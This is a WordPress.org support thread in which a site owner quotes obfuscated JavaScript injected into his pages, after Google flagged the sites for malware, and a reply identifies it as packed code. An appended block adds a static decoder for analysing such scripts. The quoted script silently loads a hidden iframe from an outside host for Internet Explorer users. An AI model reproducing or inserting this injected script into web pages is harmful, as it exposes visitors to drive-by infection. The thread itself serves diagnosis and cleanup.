WordPress.org


Google is telling me my site has malware! (2 posts)

  1. nexitv
    Member
    Posted 2 years ago #

    Hello,

    I am hoping someone can help me here. I have the same problem on two of my websites:

    http://www.nexi.tv and http://www.filmlive.tv

    Google sent me this email:

    Dear site owner or webmaster of nexi.tv,
    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

    Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

    http://nexi .tv/
    http://www.nexi .tv/
    http://nexi .tv/advertise/

    Here is a link to a sample warning page:
    http://www.google.com/interstitial?url=http%3A//nexi.tv/

    We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

    1) the site was compromised
    2) the site doesn't monitor for malicious user-contributed content
    3) the site displays content from an ad network that has a malicious advertiser

    If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
    http://www.stopbadware.org/home/security

    Once you've secured your site, you can request that the warning be removed by visiting
    http://www.google.com/support/webmasters/bin/answer.py?answer=45432
    and requesting a review. If your site is no longer harmful to users, we will remove the warning.

    Sincerely,
    Google Search Quality Team

    When I log into Webmaster Tools, it gives me a list of infected pages and it tells me that the following code is the problem:

    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?
    '':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c
    .toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c
    )]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){retu
    rn'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\
    \b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!
    a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\'
    ;0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3(
    "p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u(
    "9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|M
    akeFrameEx|element|yahoo_api|height|width|display|none|body|
    getElementById|function|createElement|iframe|appendChild|src
    |id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http
    |userAgent|1000|hgdh|navigator|ai|showthread|php|72241732'.s
    plit('|'),0,{}))
    </script>

    When I view the source code I can see the script on the site.

    I have tried re-installing WordPress to no avail.

    Does anyone know what this is and how to fix it?

    Thanks.

    Ben

  2. This is "packed" JavaScript code. You can "unpack" it to help identify the cause.

    EDIT: Check this page here... looks like this guy had the same thing happen.

    http://www.victorciobanu.com/how-to-remove-mwjsdepack/
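
A static decoder for the packer format the reply above refers to, as an added example that is not part of the original thread: it rebuilds the source by dictionary substitution and never calls eval(), so the payload is not executed. SAMPLE is a constructed script pointing at example.invalid, and the function names are assumptions.

```javascript
// Added example: static decoder for "p,a,c,k,e,d" packed scripts. No eval() is used.

// Encode a dictionary index the way the packer does (radix up to 62).
function encodeIndex(n, radix) {
  const head = n < radix ? '' : encodeIndex(Math.floor(n / radix), radix);
  const r = n % radix;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Rebuild the source text from the packer's arguments by plain substitution.
function unpack(payload, radix, count, keywords) {
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    dict.set(token, keywords[i] || token); // empty slot: the token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (w) => (dict.has(w) ? dict.get(w) : w));
}

// Read the four arguments out of the packed text without running any of it.
// Only the \' and \\ escapes are undone, which covers typical packer output.
function extractPacked(source) {
  const re = /\}\('((?:\\.|[^'\\])*)',(\d+),(\d+),'((?:\\.|[^'\\])*)'\.split\('\|'\)/;
  const m = re.exec(source);
  if (!m) return null;
  const unesc = (s) => s.replace(/\\(['\\])/g, '$1');
  return { payload: unesc(m[1]), radix: Number(m[2]), count: Number(m[3]),
           keywords: unesc(m[4]).split('|') };
}

// Decode and summarise what the script would have done, for triage.
function analyze(source) {
  const args = extractPacked(source);
  if (!args) return null;
  const decoded = unpack(args.payload, args.radix, args.count, args.keywords);
  return {
    decoded,
    urls: decoded.match(/https?:\/\/[^\s'"]+/g) || [],
    createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/.test(decoded),
    hidesElement: /display\s*=\s*['"]none['"]/.test(decoded),
  };
}

// Constructed sample (decoder body elided, host is example.invalid).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* decoder omitted */}('1 0=2.3(\'4\');0.5.6=\'7\';0.8=\'9://a.b/\'',12,12,'el|var|document|createElement|iframe|style|display|none|src|http|example|invalid'.split('|'),0,{}))`;

console.log(analyze(SAMPLE));
```

A copy that has been hard-wrapped, as in the first post, needs its inserted line breaks removed before the arguments can be read, because the wrapping splits tokens.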

Topic Closed

This topic has been closed to new replies.
